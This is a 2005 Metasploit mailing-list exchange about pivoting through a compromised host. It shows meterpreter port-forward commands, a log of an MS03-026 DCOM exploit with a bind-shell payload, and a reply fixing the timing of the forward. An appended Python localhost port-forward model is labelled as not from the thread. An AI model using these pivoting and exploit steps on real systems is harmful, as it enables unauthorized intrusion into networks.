Metasploit mailing list archives

use of meterpreter (copy for the list)

From: mmiller at hick.org (mmiller at hick.org)
Date: Fri, 15 Apr 2005 02:14:10 -0500

On Fri, Apr 15, 2005 at 08:58:06AM +0200, Thomas Werth wrote:
Just took a second try, but I'm still doing something wrong :(
Here's "the log":

1. Hacking "proxy Host"
2. setting up portforwarding
meterpreter> portfwd -a -L 127.0.0.1 -l 9000 -h 'NextTargetIP' -p 135
portfwd: Successfully created local listener on port 9000.
meterpreter> portfwd -a -L 127.0.0.1 -l 5555 -h 'NextTargetIP' -p 5555
portfwd: Successfully created local listener on port 5555.
meterpreter> portfwd -v
Local port forward listeners:

  127.0.0.1:9000 <-> 'NextTargetIP':135
  127.0.0.1:5555 <-> 'NextTargetIP':5555
3. Launching another instance of metasploit and prepare next exploit

Exploit and Payload Options
===========================

  Exploit:    Name      Default      Description
  --------    ------    ---------    ------------------
  required    RHOST     127.0.0.1    The target address
  required    RPORT     9000         The target port

  Payload:    Name        Default    Description
  --------    --------    -------    ------------------------------------------
  required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
  required    LPORT       5555       Listening port for bind shell

  Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Got connection from 127.0.0.1:32772 <-> 127.0.0.1:5555

[*] Exiting Bind Handler.

Maybe I set up the proxy for the listen port wrong, or something else?
What do I have to fix?

My guess is that what's happening is the bind handler is establishing
the connection before you've finished exploiting the host.  What I'd
recommend doing is waiting a few seconds to create the port 5555 port
forward until after the exploit should have completed.  Once it has,
create the port forward on port 5555 and the bind handler should
establish its connection.  Right now this is all kind of kludgey because
it isn't really fully integrated (more of a prototype), but it should
work.  What's happening right now is the bind handler is establishing
the connection to port 5555 immediately (before the exploit even takes
place) which then instructs the meterpreter server to connect to the
target host on port 5555.  Since the exploit hasn't finished, the target
host isn't listening on port 5555 and thus the meterpreter server
returns a failure indication to the client which causes it to close its
half of the port forward for that connection (thus why the bind handler
exits).
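An added illustration of the failure the reply describes, not code from this thread or from Metasploit: a minimal local port forward in Python (a stand-in for "portfwd -a", with constructed function names) that only opens the outbound connection when a client reaches the local listener and closes that client's half if the outbound connect fails. Running the handler stand-in before the target listens yields an empty read (the handler "exits"); running it again after the target is listening succeeds.

```python
import socket
import threading

def relay(src, dst):  # copy src -> dst until EOF, then pass the EOF on as a half-close
    try:
        while data := src.recv(4096):
            dst.sendall(data)
        dst.shutdown(socket.SHUT_WR)
    except OSError:
        pass

def start_forward(remote_host, remote_port, local_port=0):
    # Model of "portfwd -a": the outbound connect happens only when a client arrives.
    listener = socket.socket()
    listener.bind(("127.0.0.1", local_port))
    listener.listen(5)
    def serve():
        while True:
            client, _ = listener.accept()
            try:
                remote = socket.create_connection((remote_host, remote_port))
            except OSError:      # target not listening yet: failure indication ...
                client.close()   # ... so this half of the forward is closed
                continue
            threading.Thread(target=relay, args=(client, remote), daemon=True).start()
            threading.Thread(target=relay, args=(remote, client), daemon=True).start()
    threading.Thread(target=serve, daemon=True).start()
    return listener.getsockname()[1]

def make_target():  # constructed stand-in for the next host: port bound, not yet listening
    t = socket.socket()
    t.bind(("127.0.0.1", 0))
    return t

def open_target(t):  # "exploit finished": the host now listens and echoes its input
    t.listen(5)
    def serve():
        while True:
            c, _ = t.accept()
            threading.Thread(target=relay, args=(c, c), daemon=True).start()
    threading.Thread(target=serve, daemon=True).start()

def try_handler(local_port):  # stand-in for the bind handler; b"" means it was cut off
    with socket.create_connection(("127.0.0.1", local_port), timeout=2) as s:
        try:
            s.sendall(b"hello")
            return s.recv(64)
        except ConnectionError:
            return b""
```

Everything stays on 127.0.0.1; the "target" is a bound-but-not-listening socket, so the early connect is refused just as a not-yet-exploited host would refuse it.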
